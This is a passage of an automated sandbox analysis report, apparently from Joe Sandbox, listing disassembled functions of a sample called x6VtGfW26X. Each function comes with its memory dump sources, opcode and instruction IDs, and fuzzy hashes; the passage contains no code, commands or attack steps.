                                                                                        Function 008DF34C Relevance: .3, Instructions: 258COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 71fec0fe97e02ad41372cbbe64cf4346d40e2f764d9f4709e264fa2516a5b77e
                                                                                        • Instruction ID: 3dbd2152088834d544827a9f89b7c8063f05d0120737dc7dd2f315ca05503a62
                                                                                        • Opcode Fuzzy Hash: 71fec0fe97e02ad41372cbbe64cf4346d40e2f764d9f4709e264fa2516a5b77e
                                                                                        • Instruction Fuzzy Hash: 17914BF3F1162447F3944969DC983A26183EBE5325F2F82788E5CAB7C5EC7E5C0A5284
                                                                                        Function 007E90A0 Relevance: .3, Instructions: 256COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 23d02f1b9703a1b1c3428e7d25a1ac8e7906ef0133caf213d0b392fae9a33d4d
                                                                                        • Instruction ID: b30cd2a8f41d3b968301aebd28e50997aabeab2fa3ed5130ebd9044f90b4765e
                                                                                        • Opcode Fuzzy Hash: 23d02f1b9703a1b1c3428e7d25a1ac8e7906ef0133caf213d0b392fae9a33d4d
                                                                                        • Instruction Fuzzy Hash: A471E7B660A281DBE7148F1ADC8573F77A7EBD8300F19C42CE68547296DB7C9841CB52
                                                                                        Function 008D91A7 Relevance: .3, Instructions: 256COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3880cd0a6e352d0f7d9a1b5b8b323911b42649af53cfe2fb5a73b9ed36d81230
                                                                                        • Instruction ID: 543f52d3cb09d920d26a542bebef6f16460da97e3be6800e9d3099632951d0e6
                                                                                        • Opcode Fuzzy Hash: 3880cd0a6e352d0f7d9a1b5b8b323911b42649af53cfe2fb5a73b9ed36d81230
                                                                                        • Instruction Fuzzy Hash: 3E919FB3F1162447F3544D69CC98392B243EBD5315F2F82788E58AB7C9D97E6C0A5384
                                                                                        Function 008CE370 Relevance: .3, Instructions: 256COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b7e4ec853ed86ff98b29294c6883b42542349564e3830a888005f26832316b71
                                                                                        • Instruction ID: 8bc10077426ae628fada4ebf7f4511e59101b4311c0146e7cf630b95ccbae0ec
                                                                                        • Opcode Fuzzy Hash: b7e4ec853ed86ff98b29294c6883b42542349564e3830a888005f26832316b71
                                                                                        • Instruction Fuzzy Hash: C491ACB3F116254BF3504D29CC983626283EBD5325F2F82788E58ABBC9DD7E5D0A5384
                                                                                        Function 0087941A Relevance: .3, Instructions: 256COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2c4c181a1cc024c6829536fc25c144496d85b1d7cbef7aebaa04ab2d1f5d324e
                                                                                        • Instruction ID: 7b85119966e41e5cbb964885660d3db79ae1a17a25d72a2be108955fece1d8ee
                                                                                        • Opcode Fuzzy Hash: 2c4c181a1cc024c6829536fc25c144496d85b1d7cbef7aebaa04ab2d1f5d324e
                                                                                        • Instruction Fuzzy Hash: 88919AB3E1162547F3544D28CC983A2A683EB91325F2F82788E9C6B7C9D97F5D0953C4
                                                                                        Function 008190D8 Relevance: .3, Instructions: 254COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 33ffcd693b10b56c8ecf9be650e0d70ef4324dbdc08a726a19712d38ece1afdf
                                                                                        • Instruction ID: b7705c779eceac4635e1a2ae75650d9cc90d1832fe91ed2279f3291b188bb7c2
                                                                                        • Opcode Fuzzy Hash: 33ffcd693b10b56c8ecf9be650e0d70ef4324dbdc08a726a19712d38ece1afdf
                                                                                        • Instruction Fuzzy Hash: 5491BEB3F115298BF3444E28CC543A27293EBD5315F2F81788E486B7C8D93E6C4AA784
                                                                                        Function 00833262 Relevance: .3, Instructions: 254COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e80c7c598e76a838e7848afb13c7eba54e7affb2fc37bb172f30aa633fe4b25f
                                                                                        • Instruction ID: f7b378487d5dca72a19d18f6550691f19eaed64e070cf9d8a51e935dd61d28b9
                                                                                        • Opcode Fuzzy Hash: e80c7c598e76a838e7848afb13c7eba54e7affb2fc37bb172f30aa633fe4b25f
                                                                                        • Instruction Fuzzy Hash: 4581AEF7F6162447F3944869CC983A26183DBE5325F2F81788F58AB7C5E87E9C0A1384
                                                                                        Function 0085A44C Relevance: .3, Instructions: 254COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7f28ce4cb0e9675a914d273812a087dc0996824e18dbe68c1fce8bc3b2cd5c3b
                                                                                        • Instruction ID: fb8f4e139d8b4e7139798d0e57bd42440f98e768a4315eafd4703ad5edbafeff
                                                                                        • Opcode Fuzzy Hash: 7f28ce4cb0e9675a914d273812a087dc0996824e18dbe68c1fce8bc3b2cd5c3b
                                                                                        • Instruction Fuzzy Hash: 71918AB3F116248BF3944968DC983A67293EB95711F2F81388F896B3C5DD7E5C099384
                                                                                        Function 008511D1 Relevance: .3, Instructions: 253COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ff75088cbd632ca7218d714b76d0de3795c7c2ff7a91f2f26f361f6937cf6677
                                                                                        • Instruction ID: e4a37aadebc0a406a49708930680459794d5d11d4c33090db9822821f2d8e08e
                                                                                        • Opcode Fuzzy Hash: ff75088cbd632ca7218d714b76d0de3795c7c2ff7a91f2f26f361f6937cf6677
                                                                                        • Instruction Fuzzy Hash: B59102B3F116258BF7440D28CC983A27283EBD5321F2F42788E59AB7C5C97E6D0A5384
                                                                                        Function 007EC1B0 Relevance: .3, Instructions: 252COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 504102944f4eda233b71f0cfb547bd2ad2f323fdeea65024a2fa4fb9a499b990
                                                                                        • Instruction ID: ab25eb2364b658db84f99ac5708ffffe993439f4f11bf7ebd53dc63c7599eaed
                                                                                        • Opcode Fuzzy Hash: 504102944f4eda233b71f0cfb547bd2ad2f323fdeea65024a2fa4fb9a499b990
                                                                                        • Instruction Fuzzy Hash: 3F617976F062908FD721DE6EC88126BB792FBC9320F1DC52CD9989B255D2789C52C7C2
                                                                                        Function 00845332 Relevance: .3, Instructions: 252COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9d4887eace6782e5473e8144a4041bf1e7a2b755fc168f16892e984f3704ede5
                                                                                        • Instruction ID: 9a27bdbf26cf98236638417cde0c61bf9a1ed218140a4444daefcfd0b1620b0f
                                                                                        • Opcode Fuzzy Hash: 9d4887eace6782e5473e8144a4041bf1e7a2b755fc168f16892e984f3704ede5
                                                                                        • Instruction Fuzzy Hash: 5491AEB3F116294BF3544839CC683A666839BE5321F2F42798E5D6B7CADC3E5C0A5384
                                                                                        Function 008C9355 Relevance: .3, Instructions: 252COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0fcd4169f528e1227a9e53172a49574d8f462429844bd236d98d639f7eef43bd
                                                                                        • Instruction ID: a4e1d6839418e99d5e8946699fd8bd29768168e71f02400030ee5fea24a9d93b
                                                                                        • Opcode Fuzzy Hash: 0fcd4169f528e1227a9e53172a49574d8f462429844bd236d98d639f7eef43bd
                                                                                        • Instruction Fuzzy Hash: E2918AB3F115258BF3504928CC943A27693DBD6325F3F82788E68AB7C5D97E9C0A5384
                                                                                        Function 008CA13E Relevance: .3, Instructions: 251COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
